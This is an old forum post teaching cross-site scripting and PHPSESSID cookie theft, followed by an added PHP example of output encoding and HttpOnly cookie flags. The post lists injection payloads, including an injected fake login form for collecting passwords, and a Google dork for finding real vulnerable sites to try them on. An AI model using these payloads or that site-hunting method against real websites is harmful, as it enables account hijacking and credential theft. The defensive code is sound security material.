|blackhawk||Date: Monday, 2012-02-13, 6:03 PM | Message # 1|
A cookie is a variable that is used to store login credentials and to keep the user logged in. Whenever your cookies are cleared you can no longer stay logged in to any site. On a PHP-powered page the cookie looks like PHPSESSID. Whenever a webpage uses PHPSESSID to authenticate its users, the cookie can be stolen using a cross-site scripting attack. In this way the attacker can spoof using one cookie and hijack his session.
XSS can be considered a dangerous exploit as most web pages are user interactive. For the purpose of interaction the webpage provides fields for comments, search and even feedback. 90 percent of user interactive websites are vulnerable to this type of attack, though some percentage of sites have a high risk of exploitation.
For testing XSS you can inject the script like
into search fields, comment fields and feedback forms. If you find the output of the page which looks like a large heading that reads welcome or an alert box that says hello.
To give it a try, click the link http://testasp.vulnweb.com/Search.asp
Insert the below codes:
code 1: <h1>XSSED</h1>
code 2: <script>alert("XSSED")</script>
code 3: <img src="URL OF THE IMAGE"></img>
code 4: <br><br>Login to proceed:<form action="destination.asp"><table><tr><td>Login:</td><td><input type=text length=10 name=login></td></tr><tr><td>Password:</td><td><input type=text length=10 name=password></td></tr></table><input type=submit value=LOGIN></form>
Where destination.asp can be a script that stores the data entered in the fields.
This code can be injected directly into the url as follows:
code 5: <script>alert(document.cookie)</script>
To find the vulnerable pages we can use some XSS dorks like "inurl:search.php?q="
Type any of the dorks into Google and input the codes given.
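
From the defending side, the reflected search field and the readable PHPSESSID described in the post above are closed by output encoding and cookie flags. The following is an added example, not part of the original post; the handler and function names are hypothetical, and it assumes PHP 7.3 or later.

```php
<?php
// Added example, not from the original post. Function names are hypothetical.
// Requires PHP 7.3+ for the array form of session_set_cookie_params().

// Mark PHPSESSID so document.cookie cannot read it and it never travels over plain HTTP.
function harden_session_cookie(): void
{
    session_set_cookie_params([
        'secure'   => true,   // HTTPS only
        'httponly' => true,   // hidden from JavaScript
        'samesite' => 'Lax',
    ]);
    session_start();
}

// Vulnerable form: the search term is reflected into the page verbatim.
function render_results_unsafe(string $q): string
{
    return '<p>Results for: ' . $q . '</p>';
}

// Hardened form: HTML-encode the term for the element-content context.
function render_results_safe(string $q): string
{
    return '<p>Results for: '
        . htmlspecialchars($q, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</p>';
}

if (PHP_SAPI !== 'cli') {            // web request, e.g. search.php?q=...
    harden_session_cookie();
    $q = $_GET['q'] ?? '';
    echo render_results_safe(is_string($q) ? $q : '');
    exit;
}

// CLI self-check using the test strings from the post (codes 1, 2 and 5).
$samples = [
    '<h1>XSSED</h1>',
    '<script>alert("XSSED")</script>',
    '<script>alert(document.cookie)</script>',
];
foreach ($samples as $s) {
    $safe = render_results_safe($s);
    if (strpos($safe, '<script') !== false || strpos($safe, '<h1') !== false) {
        throw new RuntimeException('raw markup survived encoding');
    }
    echo $safe, PHP_EOL;
}
```

Run from the command line, it prints the three strings as inert text (`&lt;script&gt;...`); the encoding shown is correct for element content only, and values placed in attributes, URLs or script blocks need the encoding for that context.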